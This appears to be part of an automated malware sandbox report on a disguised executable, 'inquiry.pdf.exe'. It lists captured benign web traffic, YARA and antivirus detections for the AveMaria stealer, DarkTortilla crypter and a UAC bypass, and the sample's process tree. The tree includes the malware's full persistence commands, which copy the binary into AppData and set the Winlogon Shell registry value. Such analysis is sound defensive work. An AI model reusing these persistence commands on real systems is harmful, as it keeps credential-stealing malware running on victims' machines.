                                                          2022-10-03 15:29:37 UTC90INData Raw: 64 6f 63 75 6d 65 6e 74 2f 3f 75 73 70 3d 64 6f 63 73 5f 61 6c 63 22 3e 44 6f 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 63 6c 61 73 73 3d 67 62 6d 74 3e 45 76 65 6e 20 6d 6f 72 65 20 26 72 61 71 75 6f 3b 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53
                                                          Data Ascii: document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.co.uk/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='X_nNdRxgoWhPi3kp_PAp8A'>document.queryS
                                                          2022-10-03 15:29:37 UTC91INData Raw: 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 35 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 67 35 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 63 3e 3c 6f 6c 20 69 64 3d 67 62 6f 6d 20 63 6c 61 73 73 3d 67 62 6d 63 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 63 20 67 62 6d 74 63 22 3e 3c 61 20 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 70 20 67 62 6d 74 63 22 3e 3c 61 20 63 6c 61 73 73 3d 67 62
                                                          Data Ascii: ipt><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class="gbkp gbmtc"><a class=gb
                                                          2022-10-03 15:29:37 UTC92INData Raw: 67 6c 65 20 53 65 61 72 63 68 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 32 30 34 38 22 20 6e 61 6d 65 3d 22 71 22 20 73 69 7a 65 3d 22 35 37 22 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 76 61 6c 75 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 62 74 6e 47 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 69 64 3d
                                                          Data Ascii: gle Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id=
                                                          2022-10-03 15:29:37 UTC94INData Raw: 69 6e 64 65 78 4f 66 28 22 26 67 62 76 3d 32 22 29 29 7b 76 61 72 20 66 3d 67 6f 6f 67 6c 65 2e 67 62 76 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 66 7d 2c 30 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 66 6f 72 6d 3e 3c 64 69 76 20 69 64 3d 22 67 61 63 5f 73 63 6f 6e 74 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 33 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 2e 35 65 6d 22 3e 3c 62 72 3e 3c 64 69 76 20 69 64 3d 22 70 72 6d 22
                                                          Data Ascii: indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br><div id="prm"
                                                          2022-10-03 15:29:37 UTC95INData Raw: 6c 2f 65 6e 2f 61 64 73 2f 22 3e 41 64 76 65 72 74 69 73 69 6e 67 a0 50 72 6f 67 72 61 6d 6d 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 73 2f 22 3e 42 75 73 69 6e 65 73 73 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2e 68 74 6d 6c 22 3e 41 62 6f 75 74 20 47 6f 6f 67 6c 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70 72 65 66 64 6f 6d 3d 47 42 26 61 6d 70 3b 70 72 65 76 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 26 61 6d 70 3b 73 69 67 3d 4b 5f 65 4e 41 4f 4c 55 4f 78 47 6a 6b 35 73 2d 42 6e 73 75 6e 6d 68 7a 47 41 4b 47 34
                                                          Data Ascii: l/en/ads/">AdvertisingProgrammes</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a><a href="https://www.google.com/setprefdomain?prefdom=GB&amp;prev=https://www.google.co.uk/&amp;sig=K_eNAOLUOxGjk5s-BnsunmhzGAKG4
                                                          2022-10-03 15:29:37 UTC96INData Raw: 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 67 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 67 3d 62 3d 3d 3d 68 3f 61 3a 22 22 7d 3b 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 61 3d 75 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 61 29 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 67 6f 6f 67 6c 65 2e 62 78 7c 7c 67 6f 6f 67 6c 65 2e 6c 78 28 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 26 26 67 6f 6f 67 6c 65 2e 74 69 6d 65
                                                          Data Ascii: n(a){return a};var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google.lx=function(){}};google.bx||google.lx()}function p(a){google.timers&&google.time
                                                          2022-10-03 15:29:37 UTC97INData Raw: 65 70 3a 30 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 64 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 73 62 5f 68 65 5c 78 32 32 3a 7b 5c 78 32 32 61 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 6c 69 65 6e 74 5c 78 32 32 3a 5c 78 32 32 68 65 69 72 6c 6f 6f 6d 2d 68 70 5c 78 32 32 2c 5c 78 32 32 64 68 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 64 68 71 74 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 64 73 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 66 66 71 6c 5c 78 32 32 3a 5c 78 32 32 65 6e 5c 78 32 32 2c 5c 78 32 32 66 6c 5c 78 32
                                                          Data Ascii: ep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22dh\x22:true,\x22dhqt\x22:true,\x22ds\x22:\x22\x22,\x22ffql\x22:\x22en\x22,\x22fl\x2
                                                          2022-10-03 15:29:37 UTC98INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:17:28:35
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\Desktop\inquiry.pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\inquiry.pdf.exe
                                                          Imagebase:0xa90000
                                                          File size:686592 bytes
                                                          MD5 hash:6236E43DA1B2C6279760E6B2B7E2D40F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Target ID:10
                                                          Start time:17:29:03
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:11
                                                          Start time:17:29:03
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:12
                                                          Start time:17:29:04
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 7
                                                          Imagebase:0x1c0000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:13
                                                          Start time:17:29:07
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:14
                                                          Start time:17:29:07
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:15
                                                          Start time:17:29:07
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 12
                                                          Imagebase:0x1c0000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:16
                                                          Start time:17:29:11
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
                                                          Imagebase:0x1370000
                                                          File size:59392 bytes
                                                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:17
                                                          Start time:17:29:20
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 12
                                                          Imagebase:0x1c0000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:18
                                                          Start time:17:29:32
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                          Imagebase:0x1250000
                                                          File size:686592 bytes
                                                          MD5 hash:6236E43DA1B2C6279760E6B2B7E2D40F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 39%, ReversingLabs

                                                          General

                                                          Target ID:19
                                                          Start time:17:29:49
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          Imagebase:0x490000
                                                          File size:42080 bytes
                                                          MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                          General

                                                          Target ID:20
                                                          Start time:17:29:53
                                                          Start date:03/10/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          Imagebase:0x8c0000
                                                          File size:42080 bytes
                                                          MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                          General

                                                          Target ID:23
                                                          Start time:17:30:30
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                          Imagebase:0x700000
                                                          File size:78336 bytes
                                                          MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 77%, ReversingLabs
                                                          • Detection: 14%, Metadefender, Browse

                                                          General

                                                          Target ID:24
                                                          Start time:17:30:32
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                          Imagebase:0x10000
                                                          File size:78336 bytes
                                                          MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:25
                                                          Start time:17:30:35
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                          Imagebase:0x90000
                                                          File size:78336 bytes
                                                          MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:26
                                                          Start time:17:30:37
                                                          Start date:03/10/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                          Imagebase:0x7a0000
                                                          File size:78336 bytes
                                                          MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Disassembly

                                                          No disassembly